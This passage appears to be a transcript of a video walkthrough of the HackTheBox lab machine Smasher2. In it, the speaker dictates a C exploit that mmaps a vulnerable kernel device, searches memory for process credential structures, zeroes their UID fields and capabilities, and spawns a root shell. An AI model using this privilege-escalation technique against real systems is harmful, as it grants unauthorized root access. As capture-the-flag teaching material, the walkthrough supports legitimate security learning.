descriptor. And then let's go and map the memory. So this is going to be the amount we map, and this is the starting address. And then this is the actual call to mmap to map it. And we're mapping it with read, write, and we're marking it as shared memory. If you don't know what this all is, just go back over to the mmap page. And if we look at this, well, that's probably not it. The man page for map. And you should see what all these mean. So pages may be read, pages may be written, share this mapping. So where it says map shared, these are the other options you could choose. So yeah. And where did my terminal just go? Did I just put this to another pane? That was weird. There we go. So let's go back here and go through. If it fails, print failure. If it's good, then print that and return. So let's go test all this. And what I'm also going to do is create an SSH config file. And that's going to make this so much easier to copy files to and from this box. So go into .sh/config, host, Smasher2. This can be whatever name you want it. If you see me SSHing into the Kraken, this is how I normally have it configured. So host name 10.10.10.135, user DZONERZY, I believe, port 22. We probably don't even have to specify port because it's the default port. And then identity file is going to be root HTTP boxes Smasher2 Smasher2. So now if I SSH Smasher2, I don't have to specify anything. And that also works for copying files. So if I just scp exploit.c to Smasher2, it has all that stuff saved. So now we can just gcc-o exploit.c, and we have created it. So we can just do /exploit, and we see us mapping the device. And let's see, we can get rid of that. And we can validate this by just going to cat proc 24004 maps. SSH Smasher2. And now cat proc 24004 maps. And this is going to print all the memory this guy has mapped. And we can see dev DHID, it starts at 42424 and goes to this super large address. So if we were to change this exploit code to be, instead of this giant F, I really hate how this is configured. 1337 gcc-o exploit.c, and we run this again. We can see the PID changed to 24081. So cat proc 24081 maps. Go back to the top, and we didn't map bleat, but we definitely did not map as much as we thought we would. What is my exploit code? It's not what I expected. But 1, 2, 3, 4, 5, 6, 7, 8. I don't know, but we definitely changed it. It looks like it ignored these three and just mapped 1000, which is weird. I'm going to try this one last time. V exploit.c. Let's change this to all ones. 1, 2, 3, 4, 1, 2, 3, 4. GCC exploit.c, GCC-o exploit.c. Resource unavailable. Did not like me doing that. One, two, three, four. We'll do 2, 1, 2, 3. GCC-o. Okay, it's mapped. Cat proc 24121 maps. And there we go. So 424000 to 42426000. So that is changing how much we can map memory. So let's move on and do the rest of the exploit. Well, not the rest, but the next piece of the exploit, and that is searching for a credential structure. So we're searching for this piece. So we go down, and this is the next piece of code we need. So that is going right after this memory address OK call. So we do unsigned int UID get UID. This is just going to be 1000. It's getting our UID. We can printf to say this. Okay. And now we start creating a credential structure. So unsigned int cred IT equals 0. Unsigned int cred num equals 0. While unsigned, we forgot a parenthesis, long address. So this address is just going to be going through our full address, starting at 42424.0.0.0, and then incrementing all the way to everything we have mapped. So map start plus size minus 0x40. Cred IT equals 0. If ADR cred IT plus plus equals UID. And we go down, I think 1, 2, 3, 4, 5, 6, 7. 1, 2, 3, 4, 5, 6, 7. Do one more, and then get rid of that. And again, this is just going to this. There's 8 here. 1, 2, 3, 4, 5, 6, 7, 8. So we're searching for the UID 8 times. 1, 2, 3, 4, 5, 6, 7, 8. Okay. And I don't know what I just did there. Doesn't look like I changed anything. So we end that if. Okay. And now we do cred num plus plus printf found cred struct pointer cred num. So cred num, this is just going to be the incremented version. So if it finds multiple credentials, this will tell us. And then address cred num. Okay. ADR plus plus. So we increment the address. And we have syntax error. Let's see. That's going to that. That's going to that. This is bracket. Puts loop end, flush standard out, and we pray this is correct. So I'm just going to test this, and we have an error. Probably want right here. Let's see, unsigned long. Where am I? What line was that? 33. And this is 2 M's. There we go. So it does compile. So we can just SEP exploit.c to Smasher2. Go over to SSH, gcc-o exploit.c, and try running it. And we found quite a few CRUD structures. So we're not doing anything right now. Now we're going to put the part of the code to actually edit the credential structure. So what we have to do is, after we change it, we do a get UID, and if we are root, we say we're root. If not, we set this back. And at the very end, we're going to actually take this set back off so you can see exactly what chaos ensues. So let's go and do this. Let's go back to our exploit code, vim exploit.c. So this is if match. So let's see. Cred IT. So cred num, printf. So right here, this is where we set everything to be 0, which is root. So 1, 2, 3, 4, 5, 6, 7, 8. Everything is root now. Then we can do a if get UID is equal to 0, puts got root, break, and end that. Else, then we copy this. And before I did this, we should have set cred IT to 0. Cred IT equals 0. And we can copy this, 9, paste, and this is just going to be the UID. So we're setting everything back. Okay. And then we exit that if statement. And I think we're good. I probably didn't do all this correctly. Compiles. So let's try this. Smasher2. Copied. gcc-o exploit.c. Do we ever get root? On cred structure 14, and then the loop ends. So the only thing left to do is put some code to launch a shell. And let's see if they have that in here. If not, we'll just create it. They do. And we also have to set capabilities. So the capabilities, that is this stuff. So let's go here, v exploit.c, and then we go back to where get root is. Cred IT plus equals 1. This is going to skip the 4 bytes, and the 4 bytes is the secure bits. So we just don't want to go and modify those. So skip over those. and then address cred it equals 0x1234, and this is 1, 2, 3, 4, 5, 6, 7, 8, 9, 10. 1, 2, 3, 4, 5, 6, 7, 8, 9, 10. And then we can do execcl bin sh okay. That. Doing this in something that recognizes and auto tabs things for you is so handy, because when you make a typo, it's very apparent. Okay, GCC to make sure it compiles. It does. SCP copied. GCC-O exploit exploit.c. And we're going to try this for the last, well, second to last time, hopefully. Got root, ID, and we are root. So if I do pwd, we're in there. We can do wc-c root.text to see 33 characters in a line break. So let's go and do something hilarious and remove this thing. So instead of this, let's just put the chaos. So let's try this. And then GCC-O exploit exploit.c. So I look at my ID there, UID 1000. I'm going to run this. And we got chaos everywhere. We're also root. But if we do ID here, we are root here now. So every process this discernary, I don't even know how to say this word, but every process this guy had is now root, because we just modify the credential structure of everything. So, yep, that is the box. Sorry I'm not doing it the intended way, but I feel like this video is long enough, and maybe I'll do a one-off video doing it the intended way when I understand it better to explain it. Take care, everyone. Have a good day. Later.